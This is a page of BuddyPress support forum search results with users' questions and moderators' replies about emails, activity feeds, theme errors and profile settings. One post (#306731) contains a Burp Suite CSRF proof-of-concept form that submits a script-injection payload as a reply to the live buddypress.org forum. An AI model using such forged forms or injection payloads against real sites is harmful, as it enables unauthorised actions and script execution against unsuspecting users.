Skip to:
Content
Pages
Categories
Search
Top
Bottom

Search Results for 'buddypress'

Viewing 25 results - 4,526 through 4,550 (of 69,040 total)
  • Author
    Search Results
  • Mathieu Viet
    Moderator

    Hi @philippebrousse and @shanebp

    I’ve seen the ticket(s) (I think #8104 & #8108 are duplicates) about this need.

    In the meantime, you can still send BP Emails in text/html using wp_mail using these filters:
    https://gist.github.com/imath/4faef242ae104c65ddb9ec711ea37189

    #306774
    elliotyamoah
    Participant

    Hi, I hope this is still on topic. Here is another feature request that I need for my site. I’m looking for something like a cross-domain member type. In this case the activity feed from one BuddyPress site would feature on another BuddyPress site. Members would be filtered out by whether they have a local account or an account synchronized from another BuddyPress site.

    Please check out the post here

    Extended Community

    Thank you

    #306773
    elliotyamoah
    Participant

    Hi, I hope this is still on topic. Here is another feature request that I need for my site. I’m looking for something like a cross-domain member type. In this case the activity feed from one BuddyPress site would feature on another BuddyPress site. Please check out the post here

    Extended Community

    Thank you

    #306772
    elliotyamoah
    Participant

    Hi, I hope this is still on topic. I’m looking for something like a cross-domain member type. In this case the activity feed from one BuddyPress site would feature on another BuddyPress site. Please check out the post here

    Extended Community

    Thank you

    #306771

    In reply to: Group Type Development

    elliotyamoah
    Participant

    Hi, I hope this is still on topic for Member Types. I’m looking for something like a cross-domain member type. Please check out the post here

    Extended Community

    Thank you

    shanebp
    Moderator

    @philippebrousse

    I agree that it is an ongoing issue.
    Please open a ticket here.

    Philippe
    Participant

    Hi everyone,

    Thanks for this feed providing a working solution to an issue apparently shared by many.

    @BuddyPress-team, do you guys think it would be possible to implement a solution in bp-core similar to what @uscore713 suggested?

    I am not yet familiar enough to comprehend the need to work with plain-text emails when a custom smtp provider is defined…

    Many thanks,

    Phil

    #306756
    shanebp
    Moderator

    Probably yes re scope – so the js is not being loaded.

    That’s why I suggested just a basic form submit and handle approach.

    Or you can take the time to puzzle thru the Nouveau scope.
    For example – do you need to create an instance of the basic class?

    \bp-templates\bp-nouveau\buddypress-functions.php
    Line 659: bp_nouveau(); 
    #306754
    hrizvi
    Participant

    I want to pass login credentials of logged in users to DAPP. How do I integrate BuddyPress plugin with DAPP? DAPP(Decentralize Application) –> https://en.wikipedia.org/wiki/Decentralized_application

    #306752
    Suryakant Nirbhay
    Participant

    Hi shanebp, When I calling bp_get_template_part( ‘activity/post-form’ ) on cutom page template (child theme). It is showing the following kind of error in console.
    TypeError: BP_Nouveau.activity is undefined

    I think this is due to I am calling activity post form out the BuddyPress plugin scope. I Appreciate your help.

    Thanks

    #306751
    shanebp
    Moderator

    Unless you are a developer, it will not be easy.

    Copying the What’s New box will be difficult because of the javascript / ajax involved.

    It would be easier to just create a form and then, on submission, create a new activity item.

    #306748
    friedli
    Participant

    I have a bbpress/buddypress website in French & German, translated with WPML.
    When a user registers himself on the German version, he gets German emails. When a user register himself on the French version, he gets French emails.

    When a German speaking user is asking for a friendship with a french user, the french user gets the mail notification in German, instead of French.

    Possible solution: I add a field in the registration form where the user can choose his language BUT how can i synchronize this with the mail notifications the user gets?

    Thanks a lot for your help!

    charliprangley
    Participant

    I’ve created a site using Buddypress for a client. In testing, activation emails would be sent (sometimes to spam) but once the site launched my client started getting complaints from people not receiving their activation email, and their emails weren’t in their spam folders either.

    Some people are clicking ‘resend activation’ multiple times to no avail. While others are able to get in just fine. The site has over 3,000 users now and several hundred of them had to be activated by my client manually, which is unacceptable!

    Has anyone else had this issue where activation emails only SOMETIMES send? All the other posts I’ve seen about activation emails seem to be that none of them are working.

    What could be the solution for this intermittent sending?

    lesthomas85
    Participant

    Hello,

    I am using BUddypress 4.3.0 on wordpress 5.2.2. Under the option for a member to hide their profile from the members list. If the user selects yes then the profile is hidden.

    If you then try to change back to no (so the profile is visible) then the profile remains hidden in the members list. This happens in both the theme I am using (customify) and the Twenty Nineteen theme.

    Any help would be much appreciated.

    Many Thanks Les

    #306738
    colingdi
    Participant

    The site we’re working on has to have the ability to output every 10 entries in the activity loop a sponsored or ‘featured’ post. I’ve attacked it from 2 different ways to no avail. One nearly works in that I inject a custom post type of ‘featured post’ that displays 90% of what I want however as it’s a wordpress post not a buddypress post it doesn’t output the ability to comment or any of the usual BP controls in the feed and due to how comments are controlled in WP it’s not possible to override easily/ at all.

    I’m comfortable injecting a post into the feed and getting that sorted but does anyone have any ideas on how to get a buddypress post to be the featured post (and it needs to be an array of them as I am posting one every 10 entries so can’t be the same one over and over etc).

    Any guidance would be greatly appreciated. I’ve searched the forums to no avail and haven’t seen a plugin that’ll do it either.

    #306737

    In reply to: Profiles for Groups

    shanebp
    Moderator

    Not sure what you mean, but you can extend groups with the Group Extension API

    And perhaps some aspect of these will be helpful:
    Group Types
    Member Types

    #306736
    shanebp
    Moderator

    The error is coming from your theme – Not from BuddyPress.

    bp_is_user_forums() was removed from BuddyPress since Version 3.0.0

    You could delete those two lines from themes/moview/members/single/home.php
    If you did not add BP templates to your theme, then you could also send an error report to the creators of your theme.

    #306733
    FahimMurshed
    Participant

    Got this error on this theme.

    Fatal error: Uncaught Error: Call to undefined function bp_is_user_forums() in /Applications/MAMP/htdocs/moview/wp-content/themes/moview/members/single/home.php:85 Stack trace: #0 /Applications/MAMP/htdocs/moview/wp-includes/template.php(724): require() #1 /Applications/MAMP/htdocs/moview/wp-content/plugins/buddypress/bp-core/bp-core-template-loader.php(155): load_template('/Applications/M...', false) #2 /Applications/MAMP/htdocs/moview/wp-content/plugins/buddypress/bp-core/bp-core-template-loader.php(61): bp_locate_template(Array, true, false) #3 /Applications/MAMP/htdocs/moview/wp-content/plugins/buddypress/bp-core/bp-core-template-loader.php(338): bp_get_template_part('members/single/...', NULL) #4 /Applications/MAMP/htdocs/moview/wp-content/plugins/buddypress/bp-members/classes/class-bp-members-theme-compat.php(212): bp_buffer_template_part('members/single/...', NULL, false) #5 /Applications/MAMP/htdocs/moview/wp-includes/class-wp-hook.php(286): BP_Members_Theme_Compat->single_dummy_content('') #6 /Applications/MAMP/h in /Applications/MAMP/htdocs/moview/wp-content/themes/moview/members/single/home.php on line 85

    This file line is: /Applications/MAMP/h in /Applications/MAMP/htdocs/moview/wp-content/themes/moview/members/single/home.php on line 85

    
    		elseif ( bp_is_user_forums() ) :
    			bp_get_template_part( 'members/single/forums'   );
    

    moview theme

    If I delete this folder from this theme, style is broken.

    Please help me.

    #306731

    In reply to: Bookmark extension

    test1324
    Participant

    `<html>
    <!– CSRF PoC – generated by Burp Suite Professional –>
    <body>
    <script>history.pushState(”, ”, ‘/’)</script>
    <form action=”https://buddypress.org/support/topic/bookmark-extension/&#8221; method=”POST”>
    <input type=”hidden” name=”bbp_reply_content” value=”`<marquee>TEST</marquee> </script>SSS<script>alert(1)</script>ss” />
    <input type=”hidden” name=”bbp_topic_tags” value=”” />
    <input type=”hidden” name=”bbp_reply_submit” value=”” />
    <input type=”hidden” name=”bbp_topic_id” value=”306727″ />
    <input type=”hidden” name=”bbp_reply_to” value=”0″ />
    <input type=”hidden” name=”action” value=”bbp-new-reply” />
    <input type=”hidden” name=”_wp_http_referer” value=”/support/topic/bookmark-extension/” />
    <input type=”hidden” name=”redirect_to” value=”https://buddypress.org/support/topic/bookmark-extension/” />
    <input type=”submit” value=”Submit request” />
    </form>
    </body>
    </html>

    #306726
    demomann
    Participant

    hello! I’m looking for a buddypress extension. I would like a buddypress member to be able to add a site article to his bookmark or his wishlist. this can increase the interaction between buddypress and the site. is there a plugin that does this?

    clicken
    Participant

    Iv’e been searching for ways to keep my users on the front-end. The user links in the adminbar here on the buddypress forums will tell me I don’t have access if I click on the top links; I have to click on one of the lower links (created by buddypress) to view my user info and stufff.

    Why is it that way instead of having all those links take the user to the profile on the frontend?

    I like that part of the admin bar but I want to keep users on the frontend! Please Help!

    #306709
    shanebp
    Moderator

    Check your browser console for javascript errors.

    To see if your issue is theme related – try momentarily switching to a WP theme like 2019.

    If you still have issues, you can open a ticket here.

    ( btw- you cannot upload images here. Instead upload them somewhere else and then post the url here. )

    #306708
    brianckimble
    Participant

    Wordpress: 5.2.2
    BuddyPress: 4.3.0
    Theme: Astra

    I have an error when changing profile picture. After selecting picture from computer, the green progress loading bar is only “full” for a couple of seconds (as opposed to “filling” corresponding to the file upload), and then it displays a picture for “crop” that is either nothing or miniscule. All that is visible is the “crop” button and what appears to be the four corner dots of the crop tool all bunched together. I have screen shots of the error, but don’t know how to upload them.

    coolhunt
    Participant

    Though I wonder what the benefit of creating a new fork/platform over – separate paid-premium plug-ins and hyper tuned themes..

    Still I love buddyboss themes – but being locked in is a headache I would not ever try to think about..

    Frankly I’ve always been deeply frustrated with buddypress though..

    #306698
    Henry Wright
    Moderator

    Try using bp_parse_args(). Here is an example:

    
    function my_filter_after_has_activities_parse_args( $r ) {
        $r['per_page'] = 3;
        // Do something else here
        return $r;
    }
    add_filter( 'bp_after_has_activities_parse_args', 'my_filter_after_has_activities_parse_args' );
    

    See https://codex.buddypress.org/developer/using-bp_parse_args-to-filter-buddypress-template-loops/

Viewing 25 results - 4,526 through 4,550 (of 69,040 total)
Skip to toolbar